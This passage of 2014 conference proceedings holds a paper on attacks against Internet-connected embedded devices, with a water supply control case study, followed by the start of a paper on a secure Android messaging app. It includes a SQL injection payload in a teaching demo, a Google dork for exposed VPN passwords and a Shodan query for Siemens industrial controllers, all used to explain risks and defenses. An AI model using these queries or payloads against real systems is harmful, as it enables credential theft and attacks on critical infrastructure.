Today, many systems are connected to the Internet, even
though they were not originally intended for that purpose.
Additionally, it has been shown that even systems without any connection to the outside world can be at risk [35]: attackers can implant tiny transceivers in hardware parts such as USB plugs or small circuit boards inside a device.
A. Software Bugs
Prominent software security bugs include buffer overflows, SQL injections and cross-site scripting. They can be exploited in any connected device, embedded or not, and there are many examples where these bugs have occurred and caused damage. While security bugs are problems at the implementation level, security flaws are located at the architecture or design level. A list of the most widespread and critical errors that can lead to serious vulnerabilities in software is presented in [39]. These errors are often easy to find, easy to exploit, and often dangerous: in many cases, they allow attackers to steal or modify data, as well as to run arbitrary code on the attacked machine. The Open Web Application Security Project (OWASP) is a not-for-profit organization focused on improving the security of software; it regularly publishes a list of the top 10 security risks with the goal of raising security awareness [40].
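As a minimal illustration of one of these bug classes, the following sketch (with a hypothetical user table and inputs) contrasts a SQL query built by string concatenation, which is injectable, with a parameterized query:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
con.execute("INSERT INTO users VALUES ('alice', 'secret')")

def login_vulnerable(name: str, pw: str) -> bool:
    # Builds the query by string concatenation: attacker-controlled
    # input becomes part of the SQL statement itself.
    q = f"SELECT 1 FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return con.execute(q).fetchone() is not None

def login_safe(name: str, pw: str) -> bool:
    # Parameterized query: input is passed as data, never as SQL.
    q = "SELECT 1 FROM users WHERE name = ? AND pw = ?"
    return con.execute(q, (name, pw)).fetchone() is not None

# Classic injection payload: the password check is short-circuited.
payload = "' OR '1'='1"
print(login_vulnerable("alice", payload))  # True -- authentication bypassed
print(login_safe("alice", payload))        # False -- treated as a literal string
```

The same principle, keeping untrusted input out of the code path, is what mitigates the other listed bug classes as well (bounds checking for overflows, output encoding for cross-site scripting).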
B. Back Doors
Reverse engineering of firmware often reveals back doors in devices: developers have frequently implemented hard-coded user names and passwords for debugging and maintenance purposes. For example, the Sitecom WLM-3500 router contains two supposedly hidden user accounts. The manufacturer has released a new firmware version in which these accounts are disabled, but thousands of devices running the old version are still accessible via the Internet [30]. Other networked devices like webcams or printers often suffer from similar problems. These devices are usually used for years without getting much attention from their owners, yet they can provide an ideal entry point for malicious attackers. For example, thousands of webcams were shown to be accessible via back doors at the Black Hat 2013 conference [14].
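Back doors of this kind are often found by simply extracting printable strings from a firmware image and flagging credential-like patterns. The sketch below illustrates the idea; the image bytes and the patterns are made up for the example:

```python
import re

# Stand-in for a firmware image; a real image would be read with open(path, "rb").
firmware = b"\x7fELF\x01\x02junk\x00admin:admin\x00more\xff\xfedebug_user=service\x00"

def printable_strings(blob: bytes, min_len: int = 4):
    """Extract runs of printable ASCII, like the Unix `strings` tool."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]

# Credential-like patterns worth flagging during a firmware review.
suspicious = re.compile(r"(admin|passw|user|debug|service)", re.IGNORECASE)

hits = [s for s in printable_strings(firmware) if suspicious.search(s)]
print(hits)
```

Hard-coded credentials survive compilation as plain byte sequences, which is why this crude technique finds so many of them in practice.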
C. Configurations
Insecure default configurations make it easier for cyber
criminals to enter systems. Default passwords are publicly
known and are published on websites like [7][41].
Default running services like Universal Plug and Play
(UPnP) are often unused and increase the risk of an attack.
Google Hacking and Shodan simplify the search for such insecure systems; see Section V. With the mobile exploitation framework Routerpwn [34], it is possible to gain access to routers, switches and access points from over 30 manufacturers. The 150+ provided exploits can be executed from a browser, both locally and remotely over the Internet. Predefined access keys, especially for wireless networks, can be discovered when the methods used to calculate them are known.
D. Other Risks
Automatic update functions, as we know them from
desktop operating systems, are not the general rule for ICSs.
Firmware manufacturers usually take their time with the provision of updates, and the fact that such updates are often provided free of charge apparently does not lead to more frequent updating. Sometimes, updates are not provided at
all. But even if updates are available, private customers may
not know about them or may simply not have any interest in
installing them. Professional users may refrain from updates
when they cannot be performed without shutting down the
system. Updating a system can lead to crashes or may need
reconfigurations of parts or even the entire system. System
crashes can disrupt or paralyze business operations. In addition to technical risks, legal risks may also be involved.
Attacks can also be a problem for managers, as insufficient security management can lead to personal liability. A company may use its staff or service providers to reach its security goals, but the final responsibility remains with the company. Unsecured or poorly secured home networks have already led to court proceedings, and in case of damage, device misconfiguration and insufficiently secured smart-home solutions can lead to problems with insurance coverage.
E. Countermeasures
Measures for enhanced security are manifold and have to
be taken at various levels. Measures at the technical level
include software security, encrypted communication, authentication, authorization as well as firewalls and demilitarized zones. At the organizational level, example countermeasures include password management, patch and update
management, backup, and security awareness. Requirements for establishing, implementing, maintaining and continuously improving an Information Security Management System (ISMS) are given in the International Organization for Standardization (ISO) 27001 standard; the ISO 27000 series of standards is reserved for information security matters [38]. ISO 27001 certification demonstrates an organization's ability to provide information assurance services using best-practice processes and methodologies.
V. SEARCHING FOR VULNERABLE WEB DEVICES
Search engines are not only used for information search,
they are also used to discover embedded web devices and
data that were not meant for the public. Cyber criminals use
this for victim search and attack preparation, because many
of these devices provide sensitive information. The Google
and Shodan search engines provide plenty of information
that is useful for attackers.
A. Google Hacking
Johnny Long, a pioneer in the field of Google Hacking, has used Google to find security holes in websites and everything else on the web. Advanced search operators can
be used to find passwords, internal price lists, confidential
documents, as well as vulnerable systems. Hacker groups
like LulzSec and Anonymous have used special search queries to break into foreign systems [5]. For example, the following search term can be used to find authentication data
for Virtual Private Networks (VPN).
! Host=*.* intext:enc_UserPassword=* ext:pcf
The example shown works in a similar way with other search engines such as Bing and Yahoo. These special searches
are called Google Dorks and are collected in the Google
Hacking Database; see [9]. The database has grown to include several thousand entries. The National Security Agency (NSA) has also been using special search operators for
their Internet research. A previously confidential guide with
over 640 pages has been published by the NSA [28].
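The same dork logic can be turned around for defense: administrators can scan their own web root for files that such queries would expose. The sketch below (paths and file contents are illustrative) looks for VPN profile files (.pcf) containing stored credentials, matching the dork shown above:

```python
import os
import tempfile

def find_exposed_pcf(webroot: str):
    """Find .pcf files under a web root that contain stored VPN credentials."""
    exposed = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(".pcf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                if "enc_UserPassword=" in fh.read():
                    exposed.append(path)
    return exposed

# Demo with a throwaway directory standing in for a public web root.
root = tempfile.mkdtemp()
with open(os.path.join(root, "office-vpn.pcf"), "w") as fh:
    fh.write("[main]\nHost=vpn.example.com\nenc_UserPassword=abc123\n")
print(find_exposed_pcf(root))
```

Running such a self-audit before a search engine indexes the files removes the material the dork relies on.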
B. Shodan Hacking
Shodan is a search engine that specializes in finding online devices like webcams, routers and printers, as well as industrial control systems of power plants, that are connected to the Internet. Even nuclear power plants can be found with Shodan [11]. The following search term finds industrial control systems from Siemens in the United States.
"Simatic+S7" country:US
The Stuxnet worm had targeted these systems in Iran.
Searching for webcams with Shodan is quite popular. For
example, a search for “netcam” results in thousands of hits to
TRENDnet webcams with a backdoor to access the video
stream.
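Such queries can also be issued programmatically. The sketch below assumes the third-party `shodan` Python package and a valid API key (both assumptions; neither is mentioned in the paper), and only builds and prints the query unless a key is supplied:

```python
def build_query(product: str, country: str) -> str:
    """Compose a Shodan query like the one shown above."""
    return f'"{product}" country:{country}'

query = build_query("Simatic+S7", "US")
print(query)  # "Simatic+S7" country:US

if __name__ == "__main__":
    API_KEY = ""  # hypothetical placeholder; supply your own key
    if API_KEY:
        import shodan  # assumes `pip install shodan`
        api = shodan.Shodan(API_KEY)
        results = api.search(query)
        print(f"{results['total']} matching devices")
```

Defenders can run the same query against their own address ranges to learn what an attacker would see.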
C. Exploits and Vulnerabilities
Besides the search for vulnerable web devices, it is also
possible to search for their exploits and vulnerabilities. Many
websites like the Exploit Database [10], Metasploit [24],
Packet Storm [29], and others provide information, tools and
sample code to exploit web devices. For example, the Exploit Database provides 20,000+ exploits for a variety of
programs and systems. New entries are added almost daily.
The global web application vulnerability search engine PunkSPIDER [32] scans websites for vulnerabilities and makes this highly sensitive information available to the public. Script kiddies can use this information to attack computer systems and networks or to hack websites.
VI. CASE STUDY: WATER SUPPLY FACILITY

Water supply facilities are used to counter the variability and intensity of rainfall and to guarantee the water supply for a specific geographic region like a town or city. To ensure supply, water from wells or rainfall is pumped into large containers that keep water available during dry seasons. Maintenance of a water supply facility includes checking water levels, verifying the proper working of the water pumps, and checking for leaks. Recently, computerization has helped to automate these processes. The following case study deals with facilities that ensure the water supply for several thousand people in a small community.

We have developed a monitoring and control system that allows administrators to access all water supply facilities, to access remote cameras at these sites, and to turn pumps on and off. Additionally, various sensors have been installed at the remote sites. For example, if a door is opened, or the water level rises above or falls below a predefined level, an alarm is raised by sending an email or text message to the administrators. Administrators may then check the status of a facility remotely by turning on its video cameras, and make corrections, e.g., by switching pumps on or off.

We will depict the general architecture of the facility, and show threats due to computerization as well as countermeasures that were actually taken.

A. Architecture

Several water supply facilities are connected over the Internet to a control server. The control server provides a web interface that allows all systems to be monitored and controlled centrally. Figure 1 shows the general architecture of the system. Each water supply facility includes a control system that controls several pumps in the facility. Additionally, webcams are used to allow users to inspect the facility and also to read several analog gauges. Features of the system include turning pumps on and off, defining on/off times for pumps, switching lights, and choosing among various predefined operation modes.

Figure 1. Architectural overview

B. Implementation Aspects

At each water supply location there is a PLC, a Loxone mini server [20], labeled "control system" in Figure 1. Every mini server has an embedded web server with an interface to control the connected pumps through HTTP requests, thus allowing pumps to be operated centrally from the control server. The mini servers monitor their area and send operational states to the control server. They also transmit statistical data for further evaluation. In addition to the mini servers, webcams, i.e., INSTAR IP cameras [16], have been installed at some locations. Because these cameras can be controlled through their web interface, they are also integrated in the
central web interface of the control server. Thus, the mini
server and the IP cameras can receive commands over the
Internet. The routers at the water supply facilities use port forwarding. As the routers have no fixed IP addresses assigned, communication is based on domain names; Dynamic Domain Name Service (DDNS) is used to react to changing IP addresses.
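The HTTP control path can be sketched as follows. The URL scheme and control names below are assumptions for illustration (the mini server's documentation defines the actual interface), so only the URL construction is exercised here:

```python
from urllib.parse import quote
import urllib.request

def pump_command_url(host: str, control: str, command: str) -> str:
    """Build an HTTP request URL for a mini-server control.

    The /dev/sps/io/<control>/<command> path is an assumed example of
    the kind of embedded web-service interface described in the text.
    """
    return f"http://{host}/dev/sps/io/{quote(control)}/{quote(command)}"

url = pump_command_url("pumphouse.example.dyndns.org", "Pump1", "On")
print(url)

def send_command(url: str, user: str, password: str) -> bytes:
    # HTTP Basic auth over plain HTTP, as the case study's devices use;
    # Section VI-C explains why this is vulnerable to eavesdropping.
    mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
    mgr.add_password(None, url, user, password)
    opener = urllib.request.build_opener(urllib.request.HTTPBasicAuthHandler(mgr))
    return opener.open(url, timeout=5).read()
```

Note that the hostname is a DDNS name rather than an IP address, matching the port-forwarding setup described above.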
On the server side there is a user interface for the central
control and a web interface to receive data from the facilities.
Both the user interface and the web interface have been
programmed with PHP: Hypertext Preprocessor (PHP) [31]
and use a MySQL database [27]. Data received from the
facilities is checked for plausibility and then stored in the
database. jQuery mobile [18] is used to create a user-friendly
interface for various devices. Charts are generated with the
JavaScript library d3.js [6].
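The plausibility check performed before database insertion can be sketched like this; the field names and limits are invented for the example:

```python
# Hypothetical plausibility limits for incoming sensor readings.
LIMITS = {
    "water_level_m": (0.0, 12.0),   # assumed container height
    "pump_current_a": (0.0, 40.0),  # assumed motor rating
}

def plausible(reading: dict) -> bool:
    """Reject readings that are missing or outside physically possible ranges."""
    for field, (low, high) in LIMITS.items():
        value = reading.get(field)
        if value is None or not (low <= value <= high):
            return False
    return True

ok = {"water_level_m": 3.7, "pump_current_a": 12.5}
bad = {"water_level_m": -2.0, "pump_current_a": 12.5}  # sensor glitch
print(plausible(ok), plausible(bad))  # True False
```

Such a check protects the database and the charts from corrupted transmissions, though, as Section VI-C notes, it does not protect against an attacker who submits plausible but false values.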
C. Threats
Both the Loxone mini server and the cameras provide
sensitive information in their service banner without authentication. Additionally, the firmware version of the mini server is revealed. The cameras provide even more sensitive
information like device ID, firmware, etc., with the simple
link http://ip-camera/get_status.cgi. Because the mentioned
systems use unencrypted protocols like HTTP and File
Transfer Protocol (FTP) for communication, the submitted
credentials can easily be read through man-in-the-middle
attacks. As systems are accessible via the Internet, they can
also become victims of denial of service attacks. This can
disrupt the water supply. Bugs in software and in firmware
of the used components and backdoors can lead to dangerous
situations. Outdated software and firmware versions increase
the risk. If cyber criminals enter a system, they can manipulate values and settings, e.g., to hide error messages or to simulate defects. Moreover, safety mechanisms could be overridden, endangering persons. If the IP cameras are deactivated, it is no longer possible to monitor physical access to the facility. Turning off the pumps can paralyze the water supply; repeatedly switching the pumps on and off within short periods of time can destroy them; and when all pumps run at full power, the pressure in the lines can rise to a level at which they burst.
D. Countermeasures
Because it is not possible with the current firmware of the devices to hide sensitive information or to use secure protocols and services, access through port forwarding on the router is only allowed for registered IP addresses, such as that of the control server. Thereby, access by Shodan, Google and others is denied. It is interesting to note that a Shodan search returns more than 10,000 Loxone systems, and the webcam model used here can be found more than 700,000 times.
The access to the web interface of the central control
server is protected with digest authentication and blocks IP
addresses after a certain number of incorrect login attempts.
Furthermore, HTTP Secure (HTTPS) is used for encrypted data communication between the control server and the clients. For further analysis, every user activity is logged.
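The lockout behavior of the web interface can be sketched as follows; the threshold and the bookkeeping are illustrative, and the real server additionally uses digest authentication and HTTPS:

```python
MAX_ATTEMPTS = 5  # assumed threshold for consecutive failures
failed = {}       # IP address -> consecutive failed logins
blocked = set()

def record_login(ip: str, success: bool) -> bool:
    """Return True if the request may proceed, False if the IP is blocked."""
    if ip in blocked:
        return False
    if success:
        failed.pop(ip, None)  # a successful login resets the counter
        return True
    failed[ip] = failed.get(ip, 0) + 1
    if failed[ip] >= MAX_ATTEMPTS:
        blocked.add(ip)
        return False
    return True

for _ in range(5):
    record_login("203.0.113.7", success=False)
print("203.0.113.7" in blocked)  # True -- brute-force source is locked out
```

A production variant would expire blocks after some time and log each event, matching the activity logging mentioned above.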
An additional countermeasure is the secure data communication over the Internet with VPNs. VPN requires authentication and provides encryption, so that data is transmitted
through a secure channel between a facility and the control
server. Thus, insecure protocols like HTTP and FTP can be
secured, and man-in-the-middle attacks can be prevented.
The most important measure is to increase the security awareness of users: every technical measure is useless if users are careless. Passwords on post-it notes, insecure storage of access devices, and malicious apps can cause problems. Therefore, it is important to train users.
VII. RELATED WORK
ISE researchers discovered critical security vulnerabilities in numerous routers for small offices and home offices as well as in wireless access points. The vulnerabilities found allowed remote attackers to take full control of a device's configuration settings; some even allowed a direct authentication bypass. Attackers were able to intercept
and modify network traffic as it entered and left the network
[17]. The authors reported that the rich service and feature
sets implemented in these routers, e.g., Server Message
Block (SMB), Network Basic Input/Output System (NetBIOS), HTTP(S), FTP, UPnP, Telnet, come at a significant
cost to security. The incorporation of additional services
typically exposes additional attack surfaces that malicious
adversaries can use to gain a foothold in a victim’s network.
Leverett examined two years of results from the Shodan search engine [19]. He located, identified and categorized more than 7500 Internet-facing devices, i.e., Heating, Ventilation, and Air Conditioning (HVAC) systems, building management systems, meters, and other industrial control devices
or SCADA servers. He concluded that combined with information from exploit databases, remote attacks on selected
devices could be carried out or networks could be identified
for further reconnaissance and exploitation.
A recent analysis of a widespread compromise of routers
for small offices and home offices has been reported in [37].
Attackers were altering the device’s Domain Name Service
(DNS) configurations in order to redirect DNS requests of
their victims to IP addresses and domains controlled by the
attackers.
VIII. CONCLUSION
Embedded devices are increasingly connected to the Internet. If not properly secured, they are at risk of malicious
attack. Malicious users find tempting targets across various
markets, including consumer electronics, automobiles, medical equipment, and even military hardware. We have taken a
closer look at devices that are accessible through the Internet
today, but that are often not secured properly. We have also
shown in a small case study that these devices, if unsecured,
can pose a threat not just to the privacy of individuals and
organizations, but also to the proper functioning of critical
infrastructure. Appropriate countermeasures can considerably increase the effort an attacker needs to compromise a system, at reasonable expense on the defender's side.
REFERENCES
[1] Apache HTTP Server Project, http://httpd.apache.org. [retrieved: September, 2014]
[2] App-web, http://appwebserver.org/. [retrieved: September, 2014]
[3] K. Ashton, "That 'Internet of Things' Thing", RFID Journal, June 22, 2009. http://www.rfidjournal.com/articles/view?4986 [retrieved: September, 2014]
[4] Barracuda Web Server, https://realtimelogic.com/products/barracuda-web-server/. [retrieved: September, 2014]
[5] F. Brown and R. Ragan, "Pulp Google Hacking: The Next Generation Search Engine Hacking Arsenal", Black Hat 2011. https://media.blackhat.com/bh-us-11/Brown/BH_US_11_BrownRagan_Pulp_Google.pdf [retrieved: September, 2014]
[6] D3.js - Data-Driven Documents, http://d3js.org. [retrieved: September, 2014]
[7] DefaultPassword, http://default-password.info. [retrieved: September, 2014]
[8] DHS, "Recommended Practice: Improving Industrial Control Systems Cybersecurity with Defense-in-Depth", Department of Homeland Security, Control Systems Security Program, National Cyber Security Division, October 2009. http://ics-cert.us-cert.gov/sites/default/files/recommended_practices/Defense_in_Depth_Oct09.pdf [retrieved: September, 2014]
[9] Exploit Database, "Google Hacking Database", http://exploit-db.com/google-dorks. [retrieved: September, 2014]
[10] Exploit Database, http://www.exploit-db.com. [retrieved: September, 2014]
[11] D. Goldman, "Shodan: The scariest search engine on the Internet", CNNMoney, April 2013. http://money.cnn.com/2013/04/08/technology/security/shodan/index.html [retrieved: September, 2014]
[12] D. Halperin, T. S. Heydt-Benjamin, K. Fu, T. Kohno, and W. H. Maisel, "Security and privacy for implantable medical devices", IEEE Pervasive Computing, Special Issue on Implantable Electronics, January 2008.
[13] S. Heath, "Embedded Systems Design", EDN Series for Design Engineers, Newnes, 2nd edition, ISBN 978-0-7506-5546-0, 2003.
[14] C. Heffner, "Exploiting Surveillance Cameras - Like a Hollywood Hacker", Black Hat, July 2013. https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf [retrieved: September, 2014]
[15] F. Hu, "Cyber-Physical Systems: Integrated Computing and Engineering Design", CRC Press, ISBN 978-1466577008, 2013.
[16] INSTAR IP cameras, http://instar.com. [retrieved: September, 2014]
[17] ISE - Independent Security Evaluators, "Exploiting SOHO Router Services", Technical Report, July 2013. http://securityevaluators.com/content/case-studies/routers/soho_techreport.pdf [retrieved: September, 2014]
[18] jQuery mobile, http://jquerymobile.com. [retrieved: September, 2014]
[19] E. P. Leverett, "Quantitatively Assessing and Visualising Industrial System Attack Surfaces", University of Cambridge, PhD Thesis, 2011. http://www.cl.cam.ac.uk/~fms27/papers/2011-Leverettindustrial.pdf [retrieved: September, 2014]
[20] Loxone Home Automation, http://www.loxone.com. [retrieved: September, 2014]
[21] M. E. Luallen, "SANS SCADA and Process Control Security Survey", A SANS Whitepaper, February 2013. http://www.sans.org/reading-room/analysts-program/sans-survey-scada-2013. [retrieved: September, 2014]
[22] T. Macaulay and B. L. Singer, "Cybersecurity for Industrial Control Systems: SCADA, DCS, PLC, HMI, and SIS", Auerbach Publications, ISBN 978-1439801963, 2011.
[23] G. McGraw, "Software Security", IEEE Security & Privacy, vol. 2, no. 2, pp. 80-83, March-April 2004.
[24] Metasploit, http://www.metasploit.com. [retrieved: September, 2014]
[25] Microsoft Internet Information Services, http://www.iis.net. [retrieved: September, 2014]
[26] Mongoose - easy to use web server, http://code.google.com/p/mongoose. [retrieved: September, 2014]
[27] MySQL, http://www.mysql.com. [retrieved: September, 2014]
[28] NSA, "Untangling the Web - A Guide To Internet Research", National Security Agency, 2007, released in 2013. http://www.nsa.gov/public_info/files/Untangling_the_Web.pdf. [retrieved: September, 2014]
[29] Packet Storm, http://packetstormsecurity.com. [retrieved: September, 2014]
[30] R. Paleari, "Sitecom WLM-3500 back-door accounts", Emaze Networks S.p.A., 2013. http://blog.emaze.net/2013/04/sitecom-wlm-3500-backdoor-accounts.html. [retrieved: September, 2014]
[31] PHP: Hypertext Preprocessor, http://php.net. [retrieved: September, 2014]
[32] PunkSPIDER, http://punkspider.hyperiongray.com. [retrieved: September, 2014]
[33] RomPager Embedded Web Server, http://allegrosoft.com/embedded-web-server. [retrieved: September, 2014]
[34] Routerpwn, http://routerpwn.com. [retrieved: September, 2014]
[35] D. E. Sanger and T. Shanker, "N.S.A. Devises Radio Pathway Into Computers", The New York Times, January 14, 2014. http://www.nytimes.com/2014/01/15/us/nsa-effort-pries-open-computers-not-connected-to-internet.html. [retrieved: September, 2014]
[36] K. Stouffer, J. Falco, and K. Scarfone, "Guide to Industrial Control Systems (ICS) Security", NIST Special Publication 800-82, Revision 1, May 2013. http://csrc.nist.gov/publications/nistpubs/800-82/SP800-82-final.pdf. [retrieved: September, 2014]
[37] Team Cymru, "SOHO Pharming: The Growing Exploitation of Small Office Routers Creating Serious Risk", Whitepaper, February 2014. https://www.team-cymru.com/ReadingRoom/Whitepapers/2013/TeamCymruSOHOPharming.pdf. [retrieved: September, 2014]
[38] The ISO 27000 Directory, http://www.27000.org. [retrieved: September, 2014]
[39] The MITRE Corporation, "2011 CWE/SANS Top 25 Most Dangerous Software Errors", 2011. http://cwe.mitre.org/top25/. [retrieved: September, 2014]
[40] The Open Web Application Security Project, "OWASP Top Ten - 2013 - The Ten Most Critical Web Application Security Risks", 2013. https://owasp.org/index.php/Top_10#OWASP_Top_10_for_2013. [retrieved: September, 2014]
[41] Unknown Password, http://unknownpassword.com. [retrieved: September, 2014]
[42] Verbund AG, "Freudenau Power Plant to Become the Danube's Central Nervous System", Press Release, July 2011. http://verbund.com/cc/en/news-media/news/2011/07/07/freudenau. [retrieved: September, 2014]

Copyright (c) IARIA, 2014. ISBN: 978-1-61208-376-6
Design Issues in the Construction of a Cryptographically Secure Instant Message
Service for Android Smartphones
Alexandre Melo Braga, Daniela Castilho Schwab
Centro de Pesquisa e Desenvolvimento em Telecomunicações (Fundação CPqD)
Campinas, São Paulo, Brazil
{ambraga,dschwab}@cpqd.com.br
Abstract—This paper describes design and implementation
issues concerning the construction of a cryptographically
secure instant message service for Android devices along with
its underlying cryptographic library. The paper starts by
discussing security requirements for instant message
applications, and proceeds to the architecture of cryptographic
components and selection of cryptographic services.
Concerning this last point, two sets of services were implemented: one based only on standardized algorithms and the other based solely on non-standard cryptography.
Keywords-Cryptography; Security; Android; Instant Message.
I. INTRODUCTION
Currently, the proliferation of smartphones and tablets
and the advent of cloud computing are changing the way
software is being developed and distributed. Contemporary
to this context change, the use in software systems of
security functions based on cryptographic techniques is
increasing as well.
The scale of cryptography-based security in use today has increased not only in terms of the volume of encrypted data, but also in the number of applications with cryptographic services incorporated within their functionality. In addition to the traditional use cases historically associated with cryptography (e.g., encryption/decryption and signing/verification), there are several new usages, such as privacy-preserving controls, bringing diversity to the otherwise known universe of threats to cryptographic software.
This paper discusses the construction of a mobile
application for secure instant messaging on Android devices
and a cryptographic library intended to support it. The paper
focuses on design decisions as well as on implementation
issues. This work contributes to the state of the practice by
discussing the technical aspects and challenges of
cryptographic implementations on modern mobile devices.
The contributions of this paper are the following:
• The design of a cryptographically secure instant message service;
• The elicitation of strong security requirements for cryptographic key negotiation over instant messages;
• The selection of a minimum set of standard cryptographic services capable of fulfilling the requirements;
• The selection of non-standard cryptography in order to replace the whole standard algorithm suite.
The remaining parts of the text are organized as follows.
Section II presents related work. Section III details
requirements and design decisions. Section IV describes
implementation aspects. Section V outlines improvements
under development. Section VI concludes this text.
II. RELATED WORK
Nowadays, secure phone communication does not mean
only voice encryption, but encompasses a plethora of
security services built over the ordinary smartphone
capabilities. To name just a few, these include SMS encryption, Instant Message (IM) encryption, voice and
video chat encryption, secure conferencing, secure file
transfer, secure data storage, secure application
containment, and remote security management on the
device, including management of cryptographic keys. All
these security applications have been treated by an
integrated framework [3] as part of a research project [4].
This section focuses on security issues of IM protocols
and applications, as well as cryptography issues on Android
devices.
A. Security issues in IM protocols and applications
The work of Xuefu and Ming [7] shows the use of the eXtensible Messaging and Presence Protocol (XMPP) for IM on the web and on smartphones. Massandy and Munir [12] have performed experiments on the security aspects of communication, but there remain unsolved issues, such as strong authentication, secure storage, and the implementation of good cryptography, as shown by Schrittwieser et al. [39].
It seems that the most popular protocol for secure IM in
use today is the Off-the-Record (OTR) Messaging [32], as it
is used by several secure IM apps. OTR Messaging
handshake is based upon the SIGMA key exchange protocol
[15], a variant of Authenticated Diffie-Hellman (ADH) [45],
just like Station-to-Station (STS) [6][46], discussed in further detail in Section IV.
Figure 1. Basic flow of the secure exchange of instant messages.

A good example of security issues found in current IM software is a recently discovered vulnerability in WhatsApp [36]. The vulnerability, resulting from the misuse of the Rivest Cipher 4 (RC4) stream cipher in a secure communication protocol, allowed a malicious third party able to observe conversations to decrypt encrypted messages exchanged between two WhatsApp users. The issues related to this vulnerability are twofold: first, the incorrect use of the RC4 stream cipher in place of a block cipher; second, the reuse of cryptographic keys in both communication directions. The reuse of keys in a stream cipher, combined with the existence of fixed parts, such as headers, in the communication protocol, enabled the partial discovery of the cryptographic keys.
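The danger of reusing a stream-cipher key in both directions can be demonstrated with plain XOR, since a stream cipher encrypts by XORing the plaintext with a keystream. Here random bytes stand in for RC4 output, and the messages are invented:

```python
import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

p1 = b"MSG from Alice: meet at noon"
p2 = b"MSG from Bob:   ok, see you."

keystream = os.urandom(max(len(p1), len(p2)))  # reused in both directions
c1 = xor(p1, keystream)
c2 = xor(p2, keystream)

# An eavesdropper XORs the two ciphertexts: the keystream cancels out,
# leaving the XOR of the two plaintexts.
leak = xor(c1, c2)
assert leak == xor(p1, p2)

# Known fixed protocol parts (here the shared "MSG from " header) then
# reveal the corresponding bytes of the other message directly.
header = b"MSG from "
recovered = xor(leak[:len(header)], header)
print(recovered)  # b'MSG from '
```

This is exactly the combination described above: key reuse plus predictable protocol structure yields plaintext recovery without ever breaking the cipher itself.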
B. Cryptography issues on Android devices
A recent study [2] showed that despite the observed
diversity of cryptographic libraries in academic literature,
this does not mean those implementations are publicly
available or ready for integration with third party software.
In spite of many claims of generality, almost all of them were constructed with a narrow scope in mind and prioritize academic interest in non-standard cryptography.
Furthermore, portability to modern mobile platforms, such
as Android, is a commonly neglected concern on
cryptographic libraries, as that evaluation has shown [2].
Moreover, several misuses are commonly found in cryptographic software in use today. According to a recent
study [24], the most common misuse of cryptography in
mobile devices is the use of deterministic encryption, where
a symmetric cipher in Electronic Code Book (ECB) mode
appears mainly in two circumstances: Advanced Encryption
Standard (AES) in ECB mode of operation (AES/ECB for
short) and Triple Data Encryption Standard in ECB mode
(TDES/ECB). There are cases of cryptographic libraries in which ECB is the default mode of operation, selected automatically when the mode is not explicitly specified by the programmer. A possibly worse variation of this misuse is the Rivest-Shamir-Adleman (RSA) cryptosystem in Cipher-Block Chaining (CBC) mode with Public-Key Cryptography Standards Five (PKCS#5) padding (without randomization), which is still available in modern cryptographic libraries despite having been identified more than 10 years ago [34].
Another frequent misuse is hardcoded Initialization
Vectors (IVs), even with fixed or constant values [34]. A
related misuse is the use by the ordinary programmer of
hardcoded seeds for PRNGs [24].
A common misunderstanding concerning the correct use
of IVs arises when (for whatever reason) programmers need
to change operation modes of block ciphers. For instance, the
Java Cryptographic API [20] allows operation modes to be
easily changed, but without considering IV requirements.
According to a NIST standard [30], CBC and Cipher
Feedback (CFB) modes require unpredictable IVs. Output
Feedback (OFB) mode does not need unpredictable IVs,
but the IV must be unique to each execution of the
encryption operation. Considering these restrictions, IVs
must be both unique and unpredictable in order to work
interchangeably with almost all common operation modes of
block ciphers. The Counter (CTR) mode requires unique IVs,
and this constraint is inherited by authenticated encryption
with Galois/Counter Mode (GCM) [31].
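These IV rules can be followed in JCA by drawing a fresh IV from SecureRandom for every encryption. The sketch below (class and method names are illustrative, not from the paper) prepends the IV to the ciphertext so the receiver can recover it:

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import java.security.SecureRandom;

public class IvDemo {
    // Encrypts with AES/CBC using a fresh, unpredictable IV per call,
    // as required for CBC mode by NIST SP 800-38A.
    static byte[] encryptCbc(SecretKey key, byte[] plaintext) throws Exception {
        byte[] iv = new byte[16];               // AES block size
        new SecureRandom().nextBytes(iv);       // unique AND unpredictable
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, key, new IvParameterSpec(iv));
        byte[] ct = c.doFinal(plaintext);
        byte[] out = new byte[iv.length + ct.length]; // prepend IV to ciphertext
        System.arraycopy(iv, 0, out, 0, iv.length);
        System.arraycopy(ct, 0, out, iv.length, ct.length);
        return out;
    }

    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey key = kg.generateKey();
        byte[] a = encryptCbc(key, "hello".getBytes());
        byte[] b = encryptCbc(key, "hello".getBytes());
        // Distinct IVs make equal plaintexts encrypt to different ciphertexts.
        System.out.println(java.util.Arrays.equals(a, b)); // prints false
    }
}
```

Because the IV travels with the message in the clear, only its unpredictability, not its secrecy, matters for CBC security.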
There are two notable differences between the prototype
described in this text and the related work. First, the
prototype uses the STS protocol and its variants to
accomplish authenticated key agreement, which facilitates
extending the protocol to use alternative cryptographic
primitives. Second, authenticated encryption is the preferred
mechanism to protect messages, so the burden of IV
management is minimized.
III. REQUIREMENTS FOR SECURE IM APPLICATIONS
This section describes the primary usage scenario of a
mobile application for secure IM, as well as the selection of
cryptographic services required by that application. This
scenario illustrates the requirements elicitation that guided
the design of the library.
A. Primary usage scenario for IM applications
The prototype for cryptographically secure, end-to-end
communication operates on a device-to-device basis,
exchanging encrypted IM via standard transport protocols.
In the following text, the prototype is called CryptoIM.
CryptoIM implements the basic architecture used by all
IM applications, using the standard XMPP protocol [35] at
the transport layer. The application then adds a security
layer on top of XMPP, composed of a cryptographic
